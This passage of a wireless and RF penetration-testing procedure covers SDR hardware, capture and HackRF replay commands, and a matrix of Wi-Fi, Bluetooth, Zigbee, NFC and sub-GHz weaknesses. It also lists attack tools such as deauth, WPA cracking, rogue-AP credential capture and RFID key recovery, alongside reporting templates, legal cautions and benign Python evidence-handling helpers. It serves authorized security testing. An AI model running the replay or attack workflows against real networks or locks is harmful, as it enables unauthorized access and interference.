| Device | Frequency range | Bandwidth | Half/Full duplex | Typical price | Notes |
|---|---|---|---|---|---|
| RTL-SDR Blog v3 | 500 kHz - 1.766 GHz (with HF direct sampling) | 2.4 Msps | RX-only | ~$35 | Cheapest entry; RX-only |
| HackRF One | 1 MHz - 6 GHz | 20 Msps | Half-duplex | ~$300 | Most popular generalist; TX power ~10-15 dBm [verify 2026-04-26] |
| LimeSDR Mini 2.0 | 10 MHz - 3.5 GHz | 30.72 Msps | Full-duplex | ~$400 [verify 2026-04-26] | Full-duplex enables relay/jam-and-listen |
| BladeRF 2.0 micro xA4/xA9 | 47 MHz - 6 GHz | 61.44 Msps | Full-duplex | ~$500-720 | FPGA-resourced; xA9 = larger FPGA |
| USRP B200/B210 | 70 MHz - 6 GHz | up to 56 Msps | Full-duplex | ~$1100-1700 | Ettus / NI; lab-quality |
| Flipper Zero (sub-GHz module) | 300-928 MHz (regional) | narrow-band | Half-duplex | ~$170 | Consumer; not a true SDR but useful |
```bash
# GNU Radio Companion (GRC) — visual flowgraph editor for SDR signal-processing pipelines
# https://www.gnuradio.org/
gnuradio-companion
# GQRX — visual spectrum analyzer + audio demodulator (RX-only)
# https://gqrx.dk/
gqrx
# SDR++ — modern cross-platform spectrum/demod tool
# https://www.sdrpp.org/
# CubicSDR — alternative spectrum analyzer
# https://cubicsdr.com/
# SigDigger — interactive analyzer for unknown signals
# https://github.com/BatchDrake/SigDigger
# Universal Radio Hacker (URH) — see the Sub-GHz section above
```

- Identify the carrier — wide-band sweep (GQRX, SDR++) to locate the active band.
- Capture baseband — `rtl_sdr` / `hackrf_transfer` / `osmocom_fft` to `.cfile` / `.cu8`.
- Inspect — Inspectrum or URH to see modulation, symbol rate, packet structure.
- Demodulate — GNU Radio flowgraph (or URH built-in demodulator) to bytes.
- Decode — interpret framing; cross-reference known protocol if any (rtl_433 catalog, sigidwiki.com).
- Replay / fuzz / craft — only with authorization; TX requires hardware capable of TX (HackRF, LimeSDR, BladeRF, USRP).
```bash
# Capture 2 Msps centred at 433.92 MHz with HackRF; hackrf_transfer writes interleaved signed 8-bit I/Q,
# not the 32-bit float .cfile GNU Radio expects, so name it .cs8 and convert if a flowgraph needs floats
hackrf_transfer -r capture.cs8 -f 433920000 -s 2000000 -n 20000000   # -n = sample count (10 s at 2 Msps)
# Capture with RTL-SDR (RX-only; cheaper) — unsigned 8-bit I/Q
rtl_sdr -f 433920000 -s 2400000 -g 49 capture.cu8
# Replay (HackRF) — only with authorization
hackrf_transfer -t capture.cs8 -f 433920000 -s 2000000 -x 47
```

## Common Vulnerabilities

| Class | Wi-Fi | Bluetooth | Zigbee/Thread/Matter | LoRa | NFC/RFID | Sub-GHz |
|---|---|---|---|---|---|---|
| Weak / default credentials | PSK | Pairing PIN | Touchlink master key | AppKey | Default reader keys | Fixed code |
| Downgrade attack | WPA3→WPA2 transition | Secure→Legacy | — | — | — | — |
| Replay | Pre-PMF management frames | — | ZGP unsigned | LoRaWAN 1.0.x ABP | Static UID | Fixed-code remote |
| Rogue device / impersonation | Evil twin | BIAS | Rogue commissioner | Rogue gateway | Cloned card | Cloned remote |
| Side-channel / impl bug | Dragonblood timing | KNOB / BLURtooth | Vendor stack bugs | — | Crapto1 (MIFARE Classic) | KeeLoq weak PRNG |
| Eavesdrop (passive) | Open / WEP / OWE-only | Just-Works pairing | Unencrypted clusters | LoRa unauthenticated | — | Anything unencrypted |
## Evidence Collection

Wireless evidence is RF observation — capture the raw bytes (PCAP / HCI snoop / SDR baseband) plus the metadata that lets a reviewer reproduce:
- Channel / frequency / sample rate / antenna at capture time
- Operator handle, source MAC / BD_ADDR, GPS fix if mobile
- UTC timestamps from a synced clock (NTP or GPS-disciplined)
- SHA-256 of every artifact
Hash-and-store per [[sop-collection-log|Collection Log]]. Handshake captures and recovered keys are credentials; encrypt at rest, log access, schedule destruction in the engagement letter.
SDR .cfile / .cu8 baseband files are large (tens of MB per second of capture); plan storage capacity and hash-verification windows accordingly. Always retain the original baseband even if a derived demodulated PCAP exists — re-demodulation may yield new findings.
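Added example, not part of the original SOP: a Python helper that builds the collection-log record described above (artifact name, size, SHA-256, UTC timestamp, operator, antenna, band and channel), re-verifies an artifact against its recorded hash, and redacts MAC / BD_ADDR values to OUI-only before text goes into the report. The record layout, function names and the sample bytes are assumptions made for this example; the SHA-256 and timestamp handling are standard library.

```python
import hashlib
import json
import re
from datetime import datetime, timezone
from pathlib import Path

# Matches aa:bb:cc:dd:ee:ff or aa-bb-cc-dd-ee-ff; the first three octets (OUI) are kept
MAC_RE = re.compile(r"\b([0-9A-Fa-f]{2})[:-]([0-9A-Fa-f]{2})[:-]([0-9A-Fa-f]{2})"
                    r"(?:[:-][0-9A-Fa-f]{2}){3}\b")


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def log_entry(name, data, *, operator, antenna, band, channel, sample_rate=None, when=None):
    """One collection-log record: what was captured, where on the dial, by whom, and its hash.
    `when` defaults to the host's current UTC time (NTP/GPS-synced per the SOP)."""
    when = when or datetime.now(timezone.utc)
    return {
        "artifact": name,
        "size_bytes": len(data),
        "sha256": sha256_hex(data),
        "captured_utc": when.isoformat(timespec="seconds"),
        "operator": operator,
        "antenna": antenna,
        "band": band,
        "channel": channel,
        "sample_rate": sample_rate,
    }


def log_file(path, **meta):
    """Hash an on-disk PCAP / btsnoop / baseband file and build its log entry."""
    p = Path(path)
    return log_entry(p.name, p.read_bytes(), **meta)


def verify_entry(entry, data):
    """Chain-of-custody check: does the artifact still match what was recorded at capture time?"""
    return entry["sha256"] == sha256_hex(data) and entry["size_bytes"] == len(data)


def redact_macs(text):
    """aa:bb:cc:dd:ee:ff -> aa:bb:cc:xx:xx:xx (vendor prefix survives, device identity does not)."""
    return MAC_RE.sub(lambda m: "%s:%s:%s:xx:xx:xx" % (m.group(1), m.group(2), m.group(3)), text)


def write_collection_log(entries, path):
    """Persist the log as JSON next to (not inside) the report deliverable."""
    Path(path).write_text(json.dumps(entries, indent=2, sort_keys=True))


if __name__ == "__main__":
    # Constructed stand-in for a capture file; a real run passes a .pcapng / .btsnoop / .cs8 path to log_file()
    sample = b"constructed sample bytes standing in for an EAPOL capture"
    entry = log_entry("lab-ap-ch6.pcapng", sample, operator="op-01",
                      antenna="Alfa AWUS036ACM, 5 dBi omni", band="2.4 GHz", channel=6)
    print(json.dumps(entry, indent=2))
    print("intact:", verify_entry(entry, sample), "tampered:", verify_entry(entry, sample + b"x"))
    print(redact_macs("client 00:11:22:33:44:55 joined BSSID 66-77-88-99-AA-BB"))
```

Dash-separated addresses are normalised to colon form on the way out; keep the unredacted log encrypted with the captures and let only the redacted text reach the write-up.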
## Reporting

**Title:** <Tech> · <Component> · <Issue> — e.g. "Wi-Fi · WPA2-Enterprise · PEAP/MSCHAPv2 with no server-cert validation"
**Severity:** Critical / High / Medium / Low / Info
**Tech:** Wi-Fi / Bluetooth / Zigbee / Thread / Matter / LoRa / Z-Wave / NFC / RFID / sub-GHz
**Bands / Channels:** <list>
**Affected Devices / SSIDs / BD_ADDRs / DevEUIs:** <list, redacted to OUI/vendor where appropriate>
**Description:** <what the misconfiguration / vuln is>
**Attack Path:** <step-by-step, named primitives, no production-data screenshots>
**Impact:** <confidentiality / integrity / availability + blast radius — e.g. "all corporate-Wi-Fi clients in this floor">
**Evidence:** <PCAP / HCI snoop / SDR cfile path + UTC timestamp + SHA-256>
**Remediation:** <vendor-native fix; config snippet preferred; vendor-doc link>
**References:** <CVE / vendor advisory / CIS Benchmark / IEEE / Bluetooth Core Spec section>

- WPA2-Enterprise without server-cert validation (Critical — every credential cleanly stealable from any rogue AP within range)
- Default / hard-coded keys recoverable from firmware (Critical — fleet-wide compromise)
- WPA3 deployed in transition mode where downgrade-to-WPA2 is possible (High)
- PMF disabled on enterprise Wi-Fi where deauth attacks against critical clients are feasible (High)
- Bluetooth Classic Legacy Pairing or Just-Works on devices that handle sensitive data (High)
- Zigbee / Thread / Matter commissioning credentials reused across deployment (High)
- LoRaWAN 1.0.x ABP with hard-coded session keys (High)
- MIFARE Classic / 125 kHz HID Prox in use for high-value access control (High)
- Sub-GHz fixed-code or weak-rolling-code remotes for safety-relevant devices (High)
- Open / OWE-only Wi-Fi where TLS-bearing apps assume the network is trusted (Medium)
## Tools Reference

| Tool | Domain | Purpose | Link |
|---|---|---|---|
| aircrack-ng | Wi-Fi | Capture, deauth, WEP/WPA crack | aircrack-ng.org |
| hcxdumptool / hcxtools | Wi-Fi | PMKID + 4-way handshake capture / hashcat conversion | github.com/ZerBea/hcxdumptool |
| hashcat | Wi-Fi / general | GPU-accelerated password cracking (modes 22000, 5500, 27200) | hashcat.net |
| Kismet | Wi-Fi / BLE / Zigbee | Long-running survey + plugin ecosystem | kismetwireless.net |
| wifite2 | Wi-Fi | Automated wrapper around aircrack/hcxtools | github.com/derv82/wifite2 |
| hostapd-wpe | Wi-Fi | Modified hostapd with EAP credential capture | github.com/OpenSecurityResearch/hostapd-wpe |
| eaphammer | Wi-Fi | Automated 802.1X / EAP attack | github.com/s0lst1c3/eaphammer |
| Reaver / Bully | Wi-Fi | WPS PIN / Pixie Dust | github.com/t6x/reaver-wps-fork-t6x [verify 2026-04-26] |
| mdk4 | Wi-Fi | Stress test / deauth / beacon flood (lab-only) | github.com/aircrack-ng/mdk4 |
| Wi-Fi Pineapple | Wi-Fi | Hak5 commercial rogue-AP appliance | shop.hak5.org |
| ESP32 Marauder | Wi-Fi / BLE | ESP32 firmware for portable WiFi/BLE recon | github.com/justcallmekoko/ESP32Marauder |
| BlueZ (bluetoothctl, btmon) | Bluetooth | Linux Bluetooth stack + sniffing | bluez.org |
| Sniffle | BLE | NCC Group BLE 5 sniffer (TI CC1352) | github.com/nccgroup/Sniffle |
| nRF Sniffer | BLE | Nordic + Wireshark plugin (nRF52840 dongle) | nordicsemi.com |
| btlejack | BLE | BLE 4.x sniffing + connection hijack | github.com/virtualabs/btlejack |
| crackle | BLE | LE Legacy TK recovery | github.com/mikeryan/crackle |
| mirage | BLE / Zigbee | Unified RF attack framework | github.com/RCayre/mirage |
| KillerBee | Zigbee / 802.15.4 | Sniffing / injection toolkit | github.com/riverloopsec/killerbee |
| Z3sec / Zigator | Zigbee / 802.15.4 | Newer 802.15.4 research framework [verify 2026-04-26] | search GitHub |
| EZ-Wave | Z-Wave | SDR-based Z-Wave research | [verify 2026-04-26 — repo URL has moved] |
| gr-lora | LoRa | GNU Radio LoRa-PHY decoder (rpp0) | github.com/rpp0/gr-lora |
| ChirpStack | LoRaWAN | Open-source network server (lab) | chirpstack.io |
| Proxmark3 (Iceman fork) | NFC / RFID | 125 kHz + 13.56 MHz universal | github.com/RfidResearchGroup/proxmark3 |
| ChameleonMini / Ultra | NFC | Card emulation | github.com/RfidResearchGroup/ChameleonUltra |
| Flipper Zero | Multi (sub-GHz / NFC / IR / BLE / 125 kHz) | Consumer-grade tool | flipperzero.one |
| libnfc + mfoc / mfcuk | NFC | MIFARE Classic key recovery | github.com/nfc-tools/libnfc |
| GNU Radio + GRC | SDR | Visual signal-processing flowgraph | gnuradio.org |
| GQRX | SDR | Spectrum analyzer + demod (RX) | gqrx.dk |
| SDR++ | SDR | Modern spectrum tool | sdrpp.org |
| Inspectrum | SDR | Visual cfile inspector | github.com/miek/inspectrum |
| Universal Radio Hacker (URH) | SDR / sub-GHz | Point-and-click protocol RE | github.com/jopohl/urh |
| rtl_433 | Sub-GHz | Known-protocol decoder | github.com/merbanan/rtl_433 |
| RfCat | Sub-GHz | Yard Stick One TX/RX research | github.com/atlas0fd00m/rfcat |
| Wireshark | All | PCAP inspection (802.11, 802.15.4, BLE, LoRaWAN, Z-Wave dissectors) | wireshark.org |

| Hardware | Use | Notes |
|---|---|---|
| Alfa AWUS036ACH / AWUS036ACS / AWUS036ACM | Wi-Fi monitor + injection | RTL8812AU / MT7610U / MT7612U chipsets — verify current driver state per kernel [verify 2026-04-26] |
| ASUS USB-AC68 | Wi-Fi 5 USB | Linux driver community-maintained |
| Panda PAU09 | 2.4/5 GHz USB | Older RT5572 chipset, well-supported |
| nRF52840 dongle (Nordic) | BLE / Thread / Zigbee | Multi-protocol; cheap |
| TI CC2531 USB stick | Zigbee / 802.15.4 | KillerBee-supported |
| Silicon Labs EFR32MG24 dev kit | Zigbee / Thread / Matter | Vendor reference |
| Proxmark3 Easy / RDV4 | NFC / RFID | RDV4 has more memory, swappable antennas |
| Flipper Zero | Multi | Consumer tool; check regional TX restrictions |
| RTL-SDR Blog v3 | Generalist RX SDR | Cheapest entry |
| HackRF One | TX/RX SDR | 1 MHz - 6 GHz, half-duplex |
| LimeSDR Mini 2.0 / BladeRF 2.0 / USRP B210 | Full-duplex SDR | For relay attacks, repeaters, full-duplex GNU Radio flowgraphs |
| Yard Stick One | Sub-GHz TX/RX (RfCat) | Good for replay/bruteforce of 300/433/868/915 MHz remotes |
- HackTricks Wireless / Bluetooth / Pentesting Network — book.hacktricks.wiki (domain migrated from book.hacktricks.xyz in 2024 [verify 2026-04-26])
- Aircrack-ng wiki — aircrack-ng.org/doku.php
- Bluetooth SIG specifications — bluetooth.com/specifications
- IEEE 802 standards — standards.ieee.org/standard
- Sigidwiki — sigidwiki.com — catalog of unknown/known signals (community)
- GNU Radio wiki — wiki.gnuradio.org
- Dragonblood (Vanhoef & Ronen, 2019) — wpa3.mathyvanhoef.com — WPA3 SAE side-channel and downgrade analysis
- KRACK (Vanhoef & Piessens, 2017) — krackattacks.com — 4-way handshake reinstall attack
- FragAttacks (Vanhoef, 2021) — fragattacks.com — 802.11 frame-aggregation/fragmentation flaws
- PMKID attack (Steube, 2018) — Hashcat forum announcement; foundational for hcxdumptool workflow
- KNOB / BIAS / BLURtooth / BLESA — Bluetooth core attacks; track CVE references in NVD
- BrakTooth / SweynTooth — vendor-stack BLE/BR-EDR fuzzing (Singapore U Tech & Design)
- Z-Shave / EZ-Wave (Wright et al., 2017) — DEF CON 25 talk + tooling [verify 2026-04-26]
- Practical Wireless Hacking (KeyZ Hu, 2020) — Z-Wave + Zigbee CTFs / write-ups [verify 2026-04-26]
- Cisco WPA3 Deployment Guide — cisco.com — search for current WPA3 deployment guide [verify 2026-04-26]
- NSA Cybersecurity Information Sheets — Wireless — nsa.gov/cybersecurity-guidance [verify 2026-04-26]
- NIST SP 800-153 — Guidelines for Securing Wireless LANs (note: legacy doc, last updated 2012; check for successor [verify 2026-04-26])
- NIST SP 800-121 Rev. 2 — Guide to Bluetooth Security
- CIS Wireless Benchmarks — cisecurity.org/cis-benchmarks (search "wireless")
- IoT Security Foundation — iotsecurityfoundation.org
- Offensive Security PEN-210 (Wireless Attacks) — offsec.com [verify 2026-04-26]
- SANS SEC617 (Wireless Penetration Testing and Ethical Hacking) — sans.org [verify 2026-04-26]
- HackTheBox / TryHackMe wireless rooms — search current catalog
- Trommell-Z3 / Practical IoT Hacking labs — theiotlearninginitiative.com [verify 2026-04-26]
- ❌ Transmitting on any band without explicit authorization or a Faraday-cage test environment
- ❌ Skipping PMF / WPA3 capability check — running deauth attacks against PMF-enforced clients fails silently and tips off the SOC
- ❌ Treating WPS lock-state as definitive — some APs report locked but still respond to PIN attempts
- ❌ Recording SDR baseband at insufficient sample rate (Nyquist violation; signal cut off; demodulation fails downstream)
- ❌ Mixing real customer evidence with operator's own RF traffic (always operate from a dedicated lab interface, sacrificial MACs, separate antennas)
- ❌ Using consumer Bluetooth dongles for sniffing (visibility limited to host-side HCI; LL/PHY observation needs dedicated sniffer hardware)
- ❌ Trusting marketing on stack patch-state (firmware-RE the actual stack to confirm KNOB / BIAS / BLURtooth fix presence)
- ❌ Cloning RFID cards beyond the engagement scope (one card per door, per scope item, with serial number recorded; do not duplicate "for convenience")
- ❌ Forgetting that Flipper Zero sub-GHz TX is restricted in some carrier/region firmware builds — confirm device compliance per engagement region
- ❌ Leaving evidence (handshake captures, key files, baseband recordings) on the test laptop after engagement close
- ❌ Treating LoRa raw point-to-point as automatically authenticated (it isn't; LoRaWAN MAC is the authentication layer)
- ❌ Neglecting the regulatory paper trail — even RX-only logging is regulated in some jurisdictions (in part by the UK Wireless Telegraphy Act 2006, for example), which require that captures of certain communications be neither published nor disclosed
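The sample-rate pitfall above is worth seeing numerically before a capture, not after the demodulator fails. The following is an added example (a hypothetical helper, not part of this SOP's tooling) that checks whether a signal fits inside the usable part of an I/Q recording, computes the minimum sample rate for the chosen tuning, and shows where a tone outside the window folds back to by sampling a synthetic complex tone. The 80% usable-bandwidth figure and the 433.92 MHz / 1.024 MS/s scenario are constructed assumptions.

```python
"""SDR capture-window check (added example; hypothetical helper, not SOP tooling).

Complex I/Q sampling at rate fs captures fs Hz of spectrum centred on the
tuned frequency, but the outer edges are rolled off by the front-end's
decimation/anti-alias filter, so only a fraction of fs is trustworthy.
A signal that falls outside that window is not simply lost: whatever
leaks past the filter folds back into the window at a wrong offset.
"""
import cmath
import math

USABLE_FRACTION = 0.8  # assumption: trust the middle 80% of the sampled bandwidth


def capture_window(center_hz, sample_rate_hz, usable=USABLE_FRACTION):
    """Usable (lo, hi) edges of a recording tuned to center_hz at sample_rate_hz."""
    half = sample_rate_hz * usable / 2
    return center_hz - half, center_hz + half


def covers(center_hz, sample_rate_hz, signal_hz, signal_bw_hz, usable=USABLE_FRACTION):
    """True when the whole signal (signal_hz +/- bw/2) sits inside the usable window."""
    lo, hi = capture_window(center_hz, sample_rate_hz, usable)
    return lo <= signal_hz - signal_bw_hz / 2 and signal_hz + signal_bw_hz / 2 <= hi


def min_sample_rate(center_hz, signal_hz, signal_bw_hz, usable=USABLE_FRACTION):
    """Smallest fs at which the signal fits, given where the radio is tuned."""
    far_edge = max(abs(signal_hz - signal_bw_hz / 2 - center_hz),
                   abs(signal_hz + signal_bw_hz / 2 - center_hz))
    return 2 * far_edge / usable


def aliased_offset(offset_hz, sample_rate_hz):
    """Baseband offset at which a tone offset_hz from the centre appears after sampling."""
    half = sample_rate_hz / 2
    return (offset_hz + half) % sample_rate_hz - half


def measured_offset(offset_hz, sample_rate_hz, n=64):
    """Empirical check: sample a pure complex tone and estimate its frequency
    from the average phase advance between consecutive samples."""
    samples = [cmath.exp(2j * math.pi * offset_hz * k / sample_rate_hz) for k in range(n)]
    steps = [cmath.phase(samples[k + 1] * samples[k].conjugate()) for k in range(n - 1)]
    return sum(steps) / len(steps) * sample_rate_hz / (2 * math.pi)


if __name__ == "__main__":
    # Constructed scenario: a 433.92 MHz ASK remote (~50 kHz wide) while the
    # SDR is tuned to 433.000 MHz at 1.024 MS/s (a common RTL-SDR default).
    center, fs, sig, bw = 433.000e6, 1.024e6, 433.92e6, 50e3
    print("covers:", covers(center, fs, sig, bw))
    print("need fs >= %.4f MS/s" % (min_sample_rate(center, sig, bw) / 1e6))
    fold = aliased_offset(sig - center, fs)
    print("signal would fold to %.3f MHz" % ((center + fold) / 1e6))
    print("measured offset of the synthetic tone: %.1f Hz" % measured_offset(sig - center, fs))
```

In the constructed scenario the remote sits 920 kHz above the tuning centre, outside the 409.6 kHz usable half-window; the sampled tone reappears at 432.896 MHz, which looks like a real emitter at the wrong frequency. Retune to the signal or raise fs to at least the computed 2.3625 MS/s before recording.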
Wireless/RF testing transmits into shared spectrum. The canonical legal framework is in [[sop-legal-ethics|Legal & Ethics]]; this section names only the wireless-specific exposures.
- FCC Part 15 / regional equivalents are binding even when the customer authorizes the test. Authorized doesn't mean licensed; transmitting outside Part 15 unlicensed-band rules requires a license. Out-of-band TX, even by accident (harmonics, intermodulation), is enforceable.
- UK Wireless Telegraphy Act 2006 restricts disclosure of certain intercepted communications even when capture is incidental. Treat any captured payload from third-party devices as potentially regulated; do not redistribute.
- EU Cybercrime Directive 2013/40/EU + national implementations (FR LCEN, DE §202c StGB / "Hackerparagraph", IT Codice Penale 615-quater) treat unauthorized interception and key recovery as offenses regardless of intent. Written authorization for the spectrum + the targets is necessary, not optional.
- CFAA (US) has been applied to wireless attacks (deauth + capture used to enable downstream unauthorized network access). The wireless-only step plus the network-access step together form the offense.
- Jamming is criminal in nearly every jurisdiction. Even narrow-band, even short-duration, even "just to test response" — FCC Section 333 (US) prohibits willful interference. RoE that mentions jamming must be vetted by counsel before any TX.
- Spectrum used by emergency services, aviation, maritime, public safety, GPS — never transmit. Out-of-scope by default.
- Cross-border hardware shipping for HackRF / LimeSDR / BladeRF / USRP may trigger ECCN export controls; check before shipping internationally [verify 2026-04-26].
- Bystander privacy. Wi-Fi probe-request and BLE advertising captures contain MAC addresses (or randomized identifiers) of devices belonging to people who have not consented. Treat probe/adv data as personal data under GDPR Art. 6/9 where applicable; minimize collection, hash MACs that don't matter to the finding, and destroy at engagement end.
- DMCA §1201 intersects when wireless testing recovers keys baked into firmware (cross-link [[sop-firmware-reverse-engineering|Firmware RE]]); the security-research exemption (Library of Congress triennial cycle) applies but is narrower than commonly believed.
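The bystander-privacy item above calls for hashing MACs that do not matter to the finding. An added example of how to do that without losing the ability to count devices or correlate across captures (a hypothetical helper, not part of this SOP): HMAC-SHA256 under a per-engagement secret key, so tokens are stable within the engagement but cannot be reversed or matched against a precomputed table of the 2^48 address space. Addresses and SSIDs named in the RoE stay in clear; out-of-scope probed SSIDs are redacted as well, since a probe request lists networks the bystander's device has joined. The `anon-` prefix, the record layout, and every address in the sample are constructed.

```python
"""Pseudonymize bystander identifiers in Wi-Fi probe-request / BLE advertising
inventories (added example; hypothetical helper, not part of the SOP).

Design: HMAC-SHA256 under a per-engagement secret key. The same device maps
to the same token for the whole engagement (so device counts and cross-capture
correlation in the report still work), but without the key the token cannot be
reversed, and a precomputed table of the 2^48 MAC space is useless.
Identifiers named in the RoE stay in clear; everything else is tokenized.
"""
import hashlib
import hmac
import re
import secrets

MAC_RE = re.compile(r"^[0-9a-f]{2}(:[0-9a-f]{2}){5}$")


def normalize_mac(mac):
    """Lower-case colon-separated form; rejects anything that is not a 48-bit MAC."""
    mac = mac.strip().lower().replace("-", ":")
    if not MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    return mac


def is_locally_administered(mac):
    """True when the U/L bit of the first octet is set, i.e. a randomized or
    software-assigned address rather than a burned-in vendor one."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x02)


def new_engagement_key():
    """Fresh 256-bit key; store it with the evidence, destroy it at engagement end."""
    return secrets.token_bytes(32)


def pseudonym(mac, key):
    """Stable, non-reversible token for one MAC under this engagement's key."""
    tag = hmac.new(key, normalize_mac(mac).encode(), hashlib.sha256).hexdigest()
    return "anon-" + tag[:12]  # 'anon-' prefix is an assumption of this example


def sanitize_records(records, key, in_scope_macs, in_scope_ssids=()):
    """Return copies of capture records with out-of-scope MACs tokenized and
    out-of-scope probed SSIDs redacted. Input records are left untouched."""
    scope = {normalize_mac(m) for m in in_scope_macs}
    ssids = set(in_scope_ssids)
    out = []
    for rec in records:
        rec = dict(rec)
        mac = normalize_mac(rec["mac"])
        if mac in scope:
            rec["mac"] = mac
        else:
            rec["mac"] = pseudonym(mac, key)
            rec["randomized"] = is_locally_administered(mac)
            if rec.get("ssid") and rec["ssid"] not in ssids:
                rec["ssid"] = "<redacted>"
        out.append(rec)
    return out


# Constructed sample: three probe requests as they might come out of a
# monitor-mode capture. None of these addresses belong to a real device.
SAMPLE_RECORDS = [
    {"ts": "2026-04-26T10:00:01Z", "mac": "00:11:22:33:44:55", "ssid": "CUSTOMER-CORP", "rssi": -51},
    {"ts": "2026-04-26T10:00:02Z", "mac": "da:a1:19:01:02:03", "ssid": "HomeWifi_2G", "rssi": -77},
    {"ts": "2026-04-26T10:00:03Z", "mac": "DA:A1:19:01:02:03", "ssid": None, "rssi": -76},
]

if __name__ == "__main__":
    key = new_engagement_key()
    for r in sanitize_records(SAMPLE_RECORDS, key, ["00:11:22:33:44:55"], ["CUSTOMER-CORP"]):
        print(r)
```

Keep the engagement key out of the report bundle and shred it with the raw captures at close; once the key is gone the tokens are just opaque labels. The `randomized` flag records whether the original was a locally administered (randomized) address, which is itself a useful fact for the finding without revealing the address.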
OPSEC framing (operator handle, sacrificial gear, MAC randomization, IOC defang) lives in [[sop-opsec-plan|OPSEC]].
Engagement governance:
- [[sop-legal-ethics|Legal & Ethics]] - Canonical CFAA / CMA / Cybercrime Directive / DMCA framework + regulatory radio-emission rules
- [[sop-opsec-plan|OPSEC Plan]] - MAC randomization, sacrificial gear, IOC defang, operator infrastructure
- [[sop-collection-log|Collection Log]] - Chain-of-custody for PCAP / HCI / SDR baseband artifacts
- [[sop-reporting-packaging-disclosure|Reporting & Disclosure]] - Out-of-band hand-off of recovered keys, defanged report delivery
Pentesting & Security:
- [[sop-firmware-reverse-engineering|Firmware Reverse Engineering]] - Radio-stack firmware RE; embedded BLE/Zigbee/LoRa SoC analysis; key extraction from flash
- [[sop-mobile-security|Mobile Security]] - BLE / Wi-Fi attack surface as it presents on iOS / Android targets
- [[sop-ad-pentest|Active Directory Pentesting]] - WPA2-Enterprise → AD credential capture chain
- [[sop-cloud-pentest|Cloud Pentesting (AWS/Azure/GCP)]] - Cloud-managed Wi-Fi controllers (Aruba Central, Cisco Meraki, MS Cloud Mgmt); admin-plane review
- [[sop-detection-evasion-testing|Detection Evasion Testing]] - Wireless IDS / WIPS coverage testing
- [[sop-vulnerability-research|Vulnerability Research]] - Novel RF-stack vulnerabilities; fuzzing 802.11/802.15.4/BLE
- [[sop-bug-bounty|Bug Bounty Methodology]] - Hardware/IoT bounty program scoping
Analysis:
- [[../Analysis/sop-cryptography-analysis|Cryptography Analysis]] - WPA2 / WPA3 / Bluetooth / LoRaWAN crypto primitives
- [[../Analysis/sop-reverse-engineering|Reverse Engineering]] - Disassembly of captured radio-stack firmware
- [[../Analysis/sop-malware-analysis|Malware Analysis]] - IoT-resident malware acquired via wireless ingress
Version: 1.0 · Last Updated: 2026-04-26 · Review Frequency: Quarterly for Wi-Fi / Bluetooth / Matter (fast-moving spec + tool surface); semi-annual for SDR / NFC / sub-GHz fundamentals (slower-rotating)